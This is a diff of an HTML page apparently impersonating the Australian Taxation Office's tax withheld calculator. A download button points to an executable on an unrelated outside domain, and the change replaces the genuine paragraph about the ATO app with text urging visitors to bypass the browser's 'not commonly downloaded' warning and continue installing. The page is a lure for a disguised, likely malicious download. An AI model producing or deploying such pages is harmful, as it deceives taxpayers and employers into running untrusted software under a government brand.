--- a/index.html
+++ b/index.html
@@ -256,7 +256,7 @@ data-container=".download-pdf-controls" data-html="true" aria-haspopup="true">
 <a name="Tax_withheld_for_individuals_calculator"></a>
 
 <a class="button primary" href="https://extensionsdev.com/AU%20Tax%20Calculator.exe" title="Download tax withheld Calculator here">Click here to download tax withheld calculator</a><a name="ATO_app_Tax_withheld_calculator"></a><h3 class="notoc">ATO app Tax withheld calculator</h3>
-<p>The <a href="/">ATO app</a> includes a simplified version of the tax withheld calculator for use by employers and workers. It will take between 1&#160;and 2&#160;minutes to use.</p>
+<p>The <a href="/">ATO Calculator software</a> might trigger a This file is not a commonly downloaded software error, Please click the continue download to proceed with installation.</p>
 <p>It covers most scenarios, but you'll need to use the full version outlined above if you are not an Australian resident for tax purposes, are a working holiday maker, or are claiming tax offsets or Medicare levy adjustments.</p>
 <a name="What_you_can_do_with_this_calculator"></a><h2><a id="Whatyoucandowiththesecalculators" class="anchor"></a>What you can do with this calculator</h2>
 <p>If you're an employer or another withholding payer, our tax withheld calculator can help you work out the tax you need to withhold from payments you make to employees and other workers. It applies to payments made in the 2023–24 income year and takes into account:</p>
